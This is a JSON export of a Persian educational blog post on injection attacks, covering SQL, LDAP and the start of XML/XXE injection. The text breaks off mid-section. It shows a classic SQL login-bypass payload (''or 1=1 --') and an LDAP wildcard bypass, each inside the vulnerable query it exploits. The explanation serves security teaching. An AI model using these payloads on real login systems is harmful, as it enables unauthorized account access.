﻿{"id":4438,"date":"2021-10-30T12:46:25","date_gmt":"2021-10-30T12:46:25","guid":{"rendered":"https:\/\/www.irandnn.ir\/mag\/?p=4438"},"modified":"2022-03-27T13:29:57","modified_gmt":"2022-03-27T13:29:57","slug":"injection-attacks","status":"publish","type":"post","link":"https:\/\/www.irandnn.ir\/mag\/injection-attacks\/","title":{"rendered":"\u0634\u0631\u062d \u0645\u062e\u062a\u0635\u0631\u06cc \u0627\u0632 \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\">\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647:<\/span> <span class=\"rt-time\"> 10<\/span> <span class=\"rt-label rt-postfix\">\u062f\u0642\u06cc\u0642\u0647<\/span><\/span><h2><strong>\u00a0<\/strong><strong>\u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u06cc\u0627 <\/strong><strong>Injection Attacks \u0686\u06cc\u0633\u062a\u061f<\/strong><\/h2>\n<p>\u0628\u0627 \u0646\u06af\u0627\u0647\u06cc \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u062a\u062d\u062a \u0648\u0628\u060c \u0628\u0647 \u0633\u0631\u06cc \u062d\u0645\u0644\u0627\u062a\u06cc \u0628\u0631 \u0645\u06cc\u200c\u062e\u0648\u0631\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0646\u0627\u0645 \u0622\u0646\u0647\u0627\u060c \u0648\u0627\u0698\u0647\u200c\u06cc Injection \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0628\u0647 \u0686\u0634\u0645 \u0645\u06cc\u200c\u062e\u0648\u0631\u062f. \u062d\u0645\u0644\u0627\u062a Injection \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062d\u0645\u0644\u0627\u062a \u0645\u0639\u0631\u0648\u0641 \u0648 \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647\u200c\u0627\u06cc \u0645\u06cc\u200c\u0628\u0627\u0634\u0646\u062f \u06a9\u0647 \u062a\u0627\u06a9\u0646\u0648\u0646\u060c \u0648\u0628\u200c\u0633\u0627\u06cc\u062a\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0627\u0646\u062f. \u062d\u0645\u0644\u0627\u062a\u06cc \u06a9\u0647 \u0637\u0628\u0642 \u0622\u0645\u0627\u0631 \u0634\u0631\u06a9\u062a OWASP\u060c \u0633\u0627\u0644\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0644\u06cc\u0633\u062a \u067e\u0631 \u0631\u062e\u062f\u0627\u062f\u200c\u062a\u0631\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u062a\u062d\u062a \u0648\u0628\u060c \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0634\u062a\u0627\u0631\u060c \u0628\u0627 \u0645\u0631\u0648\u0631 \u0645\u062e\u062a\u0635\u0631\u06cc \u0628\u0647 \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u0628\u0627\u0647\u062a\u200c \u0648 \u062a\u0641\u0627\u0648\u062a\u200c\u0647\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u0627\u0632 \u0646\u0638\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645 \u0648 \u0631\u0627\u0647\u06a9\u0627\u0631\u0647\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0627\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0631\u0627 \u0628\u06cc\u0627\u0646 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u062f\u0631 \u0627\u062f\u0627\u0645\u0647 \u0628\u0647 \u0645\u0639\u0631\u0641\u06cc \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u067e\u0631\u062f\u0627\u0632\u06cc\u0645.<\/p>\n<h3><strong>\u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0686\u06cc\u0633\u062a\u061f<\/strong><\/h3>\n<h4><strong>\u062d\u0645\u0644\u0647 <\/strong><strong>SQL Injection<\/strong><\/h4>\n<p>\u06af\u0627\u0647\u0627 \u0627\u0632 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0647\u200c\u0635\u0648\u0631\u062a <strong>SQLi<\/strong> \u0647\u0645\u060c \u06cc\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u062e\u062a\u0635\u0631 \u0639\u0628\u0627\u0631\u062a <a href=\"https:\/\/www.irandnn.ir\/mag\/sql-injection-attack\/\"><strong>SQL Injection<\/strong><\/a> \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. SQL \u0645\u062e\u0641\u0641 \u0639\u0628\u0627\u0631\u062a <strong>Structured Query Language<\/strong> \u0648 \u0628\u0647 \u0645\u0639\u0646\u06cc <strong>\u0632\u0628\u0627\u0646 \u067e\u0631\u0633\u200c\u0648\u200c\u062c\u0648 (\u06a9\u0648\u0626\u0631\u06cc) \u0633\u0627\u062e\u062a\u0627\u0631 \u06cc\u0627\u0641\u062a\u0647 <\/strong>\u060c \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u0639\u0645\u0627\u0644 \u0639\u0645\u0644\u06cc\u0627\u062a\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u0646\u062a\u062e\u0627\u0628\u060c \u0627\u06cc\u062c\u0627\u062f\u060c \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0648 \u062d\u0630\u0641\u060c \u0631\u06a9\u0648\u0631\u062f\u0647\u0627 \u062f\u0631 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u062f\u0627\u062f\u0647 (DataBase)\u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" class=\"aligncenter wp-image-4440\" src=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/Apa-Itu-SQL-Injection-1170x702-1-300x180.jpg\" alt=\"\u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\" width=\"677\" height=\"406\" srcset=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/Apa-Itu-SQL-Injection-1170x702-1-300x180.jpg 300w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/Apa-Itu-SQL-Injection-1170x702-1-1024x614.jpg 1024w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/Apa-Itu-SQL-Injection-1170x702-1-768x461.jpg 768w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/Apa-Itu-SQL-Injection-1170x702-1.jpg 1170w\" sizes=\"(max-width: 677px) 100vw, 677px\" \/>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0632\u0645\u0627\u0646\u06cc \u0631\u062e \u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u06a9\u0647 \u062f\u0631 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc\u060c \u0634\u06cc\u0648\u0647 \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0627 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u062f\u0627\u062f\u0647 \u062e\u0648\u062f\u060c \u0646\u0627\u0627\u0645\u0646 \u0628\u0648\u062f\u0647 \u0648 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0635\u062d\u06cc\u062d\u06cc \u0628\u0631 \u0631\u0648\u06cc \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0627\u0631\u0633\u0627\u0644\u06cc \u0635\u0648\u0631\u062a \u0646\u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a\u060c \u0632\u0645\u0627\u0646\u06cc\u200c\u06a9\u0647 \u06cc\u06a9 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0628\u0627 \u062a\u0632\u0631\u06cc\u0642 \u06a9\u0648\u0626\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u062e\u0631\u0628\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062f\u0646\u0638\u0631 \u062e\u0648\u062f \u0631\u0627 \u0627\u0631\u0633\u0627\u0644 \u200c\u06a9\u0646\u062f\u060c \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0631\u0627 \u0645\u062c\u0627\u0632 \u062a\u0644\u0642\u06cc \u0646\u0645\u0648\u062f\u0647 \u0648 \u0628\u0647 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0627\u0648 \u0628\u0631\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u06cc\u06a9 \u06a9\u0648\u0626\u0631\u06cc \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u062f\u0627\u062f\u0647\u060c \u067e\u0627\u0633\u062e \u0645\u06cc\u200c\u062f\u0647\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637 \u0645\u062e\u062a\u0644\u0641 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0627 \u0645\u0642\u0627\u0635\u062f \u0632\u06cc\u0631\u060c \u0645\u0648\u0631\u062f \u0628\u0647\u0631\u0647\u200c\u0648\u0631\u06cc \u0642\u0631\u0627\u0631 \u0628\u06af\u06cc\u0631\u062f:<\/p>\n<ul>\n<li>\u0645\u0648\u062c\u0628 \u062f\u0648\u0631 \u0632\u062f\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0627\u062d\u0631\u0627\u0632\u200c\u0647\u0648\u06cc\u062a \u0648 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc(Athentication \u0648 Athorization)<\/li>\n<li>\u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0646 \u06cc\u06a9\u067e\u0627\u0631\u0686\u06af\u06cc \u0648 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0628\u0648\u062f\u0646 \u0633\u06cc\u0633\u062a\u0645 (Integrity \u0648 Availability)<\/li>\n<li>\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (Remote Code Execution)<\/li>\n<\/ul>\n<p>\u0645\u062b\u0627\u0644:<br \/>\n\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u062f\u0631 \u0635\u0641\u062d\u0647 \u0648\u0631\u0648\u062f \u06a9\u0627\u0631\u0628\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0639\u062f\u0645 \u0627\u0639\u0645\u0627\u0644 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u060c \u0645\u0627\u0646\u0646\u062f \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632\u060c \u062f\u0686\u0627\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc SQL Injection \u0634\u0648\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631\u0627\u062a SQL \u0631\u0627 \u0627\u0631\u0633\u0627\u0644 \u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u062c\u0631\u0627 \u0646\u0645\u0627\u06cc\u062f. \u062f\u0633\u062a\u0648\u0631 SQL \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0634\u0627\u0628\u0647 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0628\u0627\u0634\u062f:<\/p>\n<pre>SELECT * FROM users WHERE username=\u2019$UsernameInput\u2019 AND password=\u2019$PasswordInput\u2019<\/pre>\n<p>\u0646\u0641\u0648\u0630\u06af\u0631 \u06a9\u0648\u0626\u0631\u06cc \u0645\u0630\u06a9\u0648\u0631 \u0631\u0627 \u0628\u0627 \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u062f\u0631 \u0641\u06cc\u0644\u062f \u0646\u0627\u0645\u200c \u06a9\u0627\u0631\u0628\u0631\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p>\n<pre>\u2018or 1=1 --<\/pre>\n<p>\u067e\u0633 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u062f\u0633\u062a\u0648\u0631 SQL \u0627\u0631\u0633\u0627\u0644\u06cc\u060c \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u06a9\u0627\u0631\u0628\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0628\u0647 \u0634\u06a9\u0644 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n<pre>SELECT * FROM users WHERE username=\u2019\u2019 OR 1=1 --\u2019 AND password=\u2019\u2019<\/pre>\n<p>\u0628\u0627 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0634\u0631\u0637 \u0635\u062d\u06cc\u062d \u0628\u0648\u062f\u0646 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0628\u0627 \u06cc\u06a9 \u0634\u0631\u0637 \u0647\u0645\u06cc\u0634\u0647 \u062f\u0631\u0633\u062a \u06cc\u0639\u0646\u06cc 1=1 \u062c\u0627\u0628\u0647\u200c\u062c\u0627 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0627\u062f\u0627\u0645\u0647\u200c\u06cc \u062f\u0633\u062a\u0648\u0631\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0648\u062c\u0648\u062f \u2013 \u0627\u0635\u0637\u0644\u0627\u062d\u0627 \u06a9\u0627\u0645\u0646\u062a \u0634\u062f\u0647 \u0648 \u0627\u0632 \u062d\u0627\u0644\u062a \u0627\u062c\u0631\u0627 \u062e\u0627\u0631\u062c \u0645\u06cc\u200c\u0634\u0648\u062f. \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0627 \u0627\u0646\u062c\u0627\u0645 \u0639\u0645\u0644 \u062a\u0632\u0631\u06cc\u0642 \u06a9\u062f \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0641\u0631\u062f \u062f\u06cc\u06af\u0631 \u0646\u0641\u0648\u0630 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 <\/strong><strong>\u00a0LDAP Injection<\/strong><\/h4>\n<p>\u0648\u0627\u0698\u0647\u200c\u06cc <strong>LDAP<\/strong>\u060c \u0645\u062e\u062a\u0635\u0631 \u0639\u0628\u0627\u0631\u062a Lightweight Directory Access Protocol \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u067e\u0631\u0648\u062a\u06a9\u0644\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a\u06cc \u062f\u0631 \u0634\u0628\u06a9\u0647 \u0627\u0633\u062a. \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 LDAP \u0628\u0631\u0627\u06cc \u0645\u0648\u0627\u0631\u062f\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u06cc\u0627 \u062c\u0633\u062a\u200c\u0648\u200c\u062c\u0648 \u062f\u0631 \u0644\u06cc\u0633\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0645\u0627\u06cc\u0646\u062f. \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0628\u0648\u0633\u06cc\u0644\u0647 \u0641\u0631\u0633\u062a\u0627\u062f\u0646 \u06cc\u06a9 LDAP Query\u060c \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/p>\n<p><img decoding=\"async\" class=\"wp-image-4441 aligncenter\" src=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ldap-injection-300x158.png\" alt=\"\" width=\"767\" height=\"404\" srcset=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ldap-injection-300x158.png 300w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ldap-injection-1024x538.png 1024w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ldap-injection-768x404.png 768w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ldap-injection.png 1201w\" sizes=\"(max-width: 767px) 100vw, 767px\" \/><\/p>\n<p>\u062d\u0645\u0644\u0647\u200c\u06cc LDAP Injection \u06a9\u0647 \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f\u060c \u0632\u0645\u0627\u0646\u06cc\u200c \u0631\u062e \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u062f\u0631 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0627\u0631\u0633\u0627\u0644LDAP Query \u00a0\u0647\u0627 \u0628\u0631\u0627\u06cc \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a\u060c \u0628\u0647 \u0634\u06cc\u0648\u0647\u200c\u0627\u06cc \u0646\u0627\u0627\u0645\u0646 \u0627\u0646\u062c\u0627\u0645 \u200c\u0634\u0648\u062f \u0648 \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0648\u0626\u0631\u06cc \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062f\u0646\u0638\u0631 \u062e\u0648\u062f \u0631\u0627 \u062a\u0632\u0631\u06cc\u0642 \u0646\u0645\u0627\u06cc\u062f\u061b \u062d\u0627\u0644\u060c \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u0631\u0627 \u0645\u062c\u0627\u0632 \u062f\u0627\u0646\u0633\u062a\u0647 \u0648 \u0628\u0647 \u0622\u0646 \u067e\u0627\u0633\u062e \u0645\u06cc\u200c\u062f\u0647\u062f.<\/p>\n<p>\u062f\u0631 \u0635\u0648\u0631\u062a \u0645\u0648\u0641\u0642 \u0628\u0648\u062f\u0646 \u06cc\u06a9 \u062d\u0645\u0644\u0647\u200c\u06cc LDAP Injection\u060c \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637 \u0645\u062e\u062a\u0644\u0641\u060c \u0646\u062a\u0627\u06cc\u062c \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631 \u0628\u0631\u062f\u0627\u0631\u062f:<\/p>\n<ul>\n<li>\u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0645\u062d\u062a\u0648\u0627\u06cc \u063a\u06cc\u0631 \u0645\u062c\u0627\u0632<\/li>\n<li>\u062f\u0648\u0631 \u0632\u062f\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647<\/li>\n<li>\u062c\u0645\u0639 \u0622\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u063a\u06cc\u0631\u200c\u0645\u062c\u0627\u0632<\/li>\n<li>\u0627\u06cc\u062c\u0627\u062f \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0627\u0634\u06cc\u0627\u0621 \u062f\u0631 \u0633\u0627\u062e\u062a\u0627\u0631 \u062f\u0631\u062e\u062a\u06cc LDAP<\/li>\n<\/ul>\n<p><strong>\u0645\u062b\u0627\u0644:<\/strong><\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0627\u0632 LDAP \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f \u0648 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0628\u0631 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f. \u0646\u0641\u0648\u0630\u06af\u0631 \u0645\u062a\u0648\u062c\u0647 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0648\u0631\u0648\u062f\u06cc \u0646\u0627\u0645\u200c\u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632\u0639\u0628\u0648\u0631 \u0631\u0627 \u0628\u0647 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u067e\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n<p dir=\"ltr\">Username=*<\/p>\n<p>Password=*<\/p>\n<p>\u0628\u0639\u062f \u0627\u0632 \u062a\u0627\u06cc\u06cc\u062f\u060c \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>(&amp;(user=*)(password=*))<\/pre>\n<p>\u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u200c\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0646\u0641\u0648\u0630 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647\u200c <\/strong><strong>XML Injection<\/strong><\/h4>\n<p>XML \u06cc\u06a9\u06cc \u0627\u0632 \u0632\u0628\u0627\u0646\u200c\u0647\u0627\u06cc \u0646\u0634\u0627\u0646\u0647 \u06af\u0630\u0627\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u062e\u0644\u0627\u0641 HTML\u060c \u0645\u0646\u0627\u0633\u0628 \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0646\u06cc\u0633\u062a\u061b \u0628\u0644\u06a9\u0647 \u0628\u0631\u0627\u06cc \u062c\u0627\u0628\u0647\u200c\u062c\u0627\u06cc\u06cc\u060c \u0627\u06cc\u062c\u0627\u062f \u0648 \u0630\u062e\u06cc\u0631\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0622\u0646\u0647\u0627 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u06a9\u0647 \u0627\u0632 \u0633\u0627\u062e\u062a\u0627\u0631 XML\u060c \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u06cc\u0627 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0622\u0646\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f\u060c \u0648\u0644\u06cc \u0628\u0627\u06cc\u062f \u062a\u0648\u062c\u0647 \u06a9\u0631\u062f \u06a9\u0647 \u0627\u06af\u0631 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc\u060c \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0634\u062f\u0647 \u0628\u0627\u0634\u0646\u062f\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u06a9\u0647 \u062a\u06af\u200c\u0647\u0627\u06cc \u0645\u062f\u0646\u0638\u0631 \u062e\u0648\u062f \u0631\u0627\u060c \u0628\u0631\u0627\u06cc \u0645\u0642\u0627\u0635\u062f \u0645\u062e\u0631\u0628\u0627\u0646\u0647 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u062a\u0632\u0631\u06cc\u0642 \u0646\u0645\u0627\u06cc\u062f.<\/p>\n<p>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0627 \u0646\u0627\u0645 \u00a0XXE \u0647\u0645 \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u062e\u0641\u0641 XML External Entity \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u062f\u0631 \u0644\u06cc\u0633\u062a OWASP top 10 \u0633\u0627\u0644 2017\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 